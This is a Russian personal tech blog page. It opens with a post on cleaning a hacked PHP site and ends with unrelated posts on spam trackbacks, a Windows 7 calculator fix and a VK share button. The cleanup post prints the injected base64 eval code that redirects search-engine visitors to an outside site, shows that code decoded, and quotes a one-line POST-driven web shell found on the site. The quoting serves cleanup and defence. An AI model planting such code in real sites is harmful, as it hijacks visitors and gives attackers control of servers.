Tech Department. Техотдел.

Забавный вирус на сайте base64_decode

on Янв 10 in Безопасность, Общие темы, Проекты, Хостинг

Ко мне обратился клиент с задачей почистить сайт от вируса. Проблемы начались с того, что при переходе с поисковой системы Яндекс, с сайта клиента начало редиректить на абсолютно другой ресурс, но при заходе на сайт по прямой ссылке все отлично работало.

Вооружившись ФТП доступом ), полез смотреть. Во ВСЕХ php файлах был кусок кода при открывающемся теге <?php

eval(base64_decode(«DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcn
Nfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFR
QX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0
KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN
0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibG
VyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXI
sImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHI
oJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9y
IHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3
R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3R
yaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV
4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19t
YXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcm
VmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5
jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0
cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQ
poZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vaGFwcHluZXd5ZWFyLjM0NS5wbC8iKTsN
CmV4aXQoKTsNCn0NCn0NCn0NCn0=»));

Расшифровать этот код удалось при помощи этого ресурса.

И вот тут то я увидел что код просто гениален )

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,»yahoo») or stristr($referer,»bing») or stristr($referer,»rambler») or stristr($referer,»gogo») or stristr($referer,»live.com»)or stristr($referer,»aport») or stristr($referer,»nigma») or stristr($referer,»webalta») or stristr($referer,»begun.ru») or stristr($referer,»stumbleupon.com») or stristr($referer,»bit.ly») or stristr($referer,»tinyurl.com») or preg_match(«/yandex\.ru\/yandsearch\?(.*?)\&lr\=/»,$referer) or preg_match («/google\.(.*?)\/url/»,$referer) or stristr($referer,»myspace.com») or stristr($referer,»facebook.com») or stristr($referer,»aol.com»)) {if (!stristr($referer,»cache») or !stristr($referer,»inurl»)){
header(«Location: http://happynewyear.345.pl/»);
exit();
}}}}

 

В двух словах, эта гадость отслеживает откуда пришел юзер и если он пришел с ресурса по ссылке из этого списка url, то идет редирект на чужой сайт. Очень красиво и сразу отловить такую заразу не всем удастся. Ведь на свои ресурсы мы как правило заходим по прямой ссылке.

Чистить проще всего с помощью netbeans

Скачиваем весь сайт на локальную машину, добавляем его как project with existing source и делаем автозамену по всему проекту. Этот кусок кода меняем на пробел или пустоту. После примерно 15000 автозамен сайт чист. Для надежность можно провести поиск по base64_decode и руками проверить оставшиеся файлы. Чистить все руками очень долго и муторно )

Удачи.

 

UPDATE 29/01/2012

Вирус проявил себя снова, искали shell на сайте и нашли

проверьте папку images в корне сайта там должен быть файл post.php со следующим содержанием

<?php eval(base64_decode($_POST["php"])); ?>

И еще кое что, я даже не знаю предыдущий ли это шелл, клиенту уже лечил кто-то сайт, но на всякий случай проверьте папку

/components/com_arhcive/

ее название не случайно с ошибкой, там лежит готовый шелл для заливки всякой гадости на ваш сайт.

Спам трекбеки (trackbaсks)

on Дек 18 in Общие темы

Проблему со спам комментариями я решил давным давно, но спамеры не дремлют, и теперь блог наводнили спамовые трекбеки с сылками на посты, рекомендую всем сделать следующее:

отключить в настройках блога:

• Параметры->Обсуждение->»Разрешить оповещения с других блогов (уведомления и обратные ссылки)»  - снять с этого галочку.
• пройтись по всем записям блога и отключить трекбеки у каждой

 

Если у вас в блоге очень много записей, то вам надо подружиться с mysql и phpmyadmin оболочкой.

Для начала можно почистить старые редакции запией, они увеличивают БД и тормозят блог:

DELETE FROM wp_posts WHERE post_type = «revision»;

И волшебная команда чтобы удалить спам комментарии:

DELETE FROM wp_comments WHERE comment_approved = ’0′;

Ну и самая главная команда, чтобы отключить трекбеки у всех постов:

UPDATE wp_posts SET ping_status = ‘closed’ WHERE post_status = ‘publish’;

 

Пользуйтесь, делитесь своим опытом в комментариях.

Бардак на buypost.ru

on Июн 02 in Общие темы

Писал об этой компании и способу заработать на своем блоге в статье на  http://www.blogfinance.ru

Проблемы и глюки начались сразу, после регистрации блога на buypost.ru

У этого блога рейтинг google PR 1 но отсутствует ТИЦ, решил все таки добавить блог, чтобы оценить интерфейс buypost.ru. Регистрация прошла успешно и сайт ушел на модерацию (10.05. 2011). Спустя день, мой блог отклонили и я забросил какую либо работу c buypost.ru, так как возможности посмотреть интерфейс не было.  Дальше началось самое интересное.

21.05.2011 мне приходит письмо, что мой блог принят в работу:

Сломался калькулятор в Windows 7

on Май 01 in Общие темы

Итак, сегодня расскажу как починить сломанный калькулятор в Windows 7. Проблема весьма распространенная еще с RC версий, но разработчику плевать на это.

Однажды загрузившись и открыв калькулятор привычной комбинацией win+ R и введя команду «calc»  я увидел ЭТО:

 

Все сломалось. Как чинить? Поиск почти ничего не дал, кроме обрывков форума. Поковырявшись нашел решение этой проблемы.

Поломку калькулятора вызывает сторонний софт который ставит дополнительные шрифты, в частности подменяет в реестре параметры.

Нужно зайти в реестр windows 7  (WIN+R -> regedit):

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes]

и проверить следующие параметры:

"MS Shell Dlg"="Microsoft Sans Serif"
"Arial CE,238"="Arial,238"
"Courier New CE,238"="Courier New,238"
"Times New Roman CE,238"="Times New Roman,238"
"Helv"="MS Sans Serif"
"Tms Rmn"="MS Serif"

На выделенный параметр обратите особое внимание в 99% случаев он все исправляет,
но мой случай был (как всегда, блин) особенным.
Если вам не помогло это попробуйте изменить слудующий параметр:

Изменить одно слово Ms на Microsoft "MS Shell Dlg,204"="Ms Sans Serif,204"
на "MS Shell Dlg,204"="Microsoft Sans Serif,204"

Это мне помогло, теперь калькулятор опять в нормальном виде:

 

 

Спам достал

on Мар 26 in Общие темы

Зашел в раздел комментарии и ужаснулся. Более 7000 спам-комментариев. Подчистил комментарии в блоге. Поставил более современную капчу и провел обновления блога и всех плагинов.

Теперь стало намного лучше.

Спасибо всем, кто пишет комментарии, я могу долго не отвечать, но любой из них действительно важен для меня.

Добавление на сайт кнопки Вконтакте

on Мар 12 in Общие темы

Столкнулся сегодня с этой задачей когда ставил кнопки на свой блог о финансах. Везде предлагают автоматические скрипты, но меня это не устраивало. Мне нужна была ручная ссылка и изображение. Сегодня я расскажу как поставить кнопку Вконтакте на ваш сайт.

Вконтакте является весьма популярным ресурсом, и хотя еще есть сомнения у многих стоит ли ставить social кнопки на сайты, думаю их установка лишней не будет.

Отправная точка для вебмастеров тут http://vkontakte.ru/pages.php?act=share Здесь можно сгенерировать кнопку и код.

Ну я пошел другой дорогой, чтобы поделится статьей, достаточно всего одной ссылки:

http://vkontakte.ru/share.php?url={адрес страницы}

Ну а теперь это красиво оформим для вордпресса (только строки не переносите, у меня просто она не помещается =)):

<a href="http://vkontakte.ru/share.php?url=<?
echo(urlencode(get_permalink($post->ID))); ?>">
<img src="http://vk.com/images/vk32.png">&nbsp;Поделиться во Вконтакте</a>

И получим вот такую кнопку

Удачи. У меня этот способ работает на 100%.

Все переехало на gandi.net

on Авг 29 in Общие темы, Хостинг

Все мои проекты сменили хостинг. Окончательно поломав сервер на gandi.net  и обмозговав всю сложность ситуации, я решил сделать там gandi ai server и не парится.

Вся сложность возникла в ОГРОМНЫХ проблемах при увеличении размера жесткого диска, точнее его репартинге в линуксе, поэтому gandi ai мой выбор. Все управляется через веб-интерфейс, сайты работают. Что мне еще надо? )

Для суровых и сложных проектов надо делать другой хостинг )

Кстати что вы скажете о моем клоне сервиса твиттер wish.osokin.me ?

Возрождение

on Авг 04 in Общие темы

Не писал сюда ООООЧЕНЬ давно.

Перечитал весь блог с первых постов. Стало даже грустно. Столько умных мыслей было.

Но сегодняшний день ставит все обратно на круги своя. Я возвращаюсь в веб-разработку в полном объеме. Это вопрос всего лишь нескольких  недель.

Будут новые статьи, есть что рассказать об управлении своим временем, учету личных финансов и многому другому.

Новый камкодер Kodak PLAYSPORT

on Фев 05 in Железки, Общие темы

Компания Kodak представила новый камкодер в своей линейке, на смену, а точнее в дополнение к камкодеру Kodak Zi8, теперь присоединился новый камкодер Kodak PLAYSPORT.

Аналогично Kodak Zx1 этот камкодер Kodak PLAYSPORT также является защищенным от ударов, пыли, влаги и воды. До 3 метров под водой, вы можете быть спокойны за вашу видеокамеру (по крайней мере, так заявлено производителем). Read More

Человечество себя когда-нибудь загонит

on Фев 03 in Общие темы

Интересную тему хотелось бы обсудить. С каждым годом наш темп жизни все быстрее и быстрее. Просыпаемся в 6 чтобы успеть по пробкам на работу, обедаем шаурмой и прочим фастфудом, причем делаем это как можно скорее. Задерживаемся вечером на работе, чтобы не ехать по пробкам домой. Когда это все кончится? Никогда!

Человечество постоянно хотело сократить время на одни процессы, чтобы Read More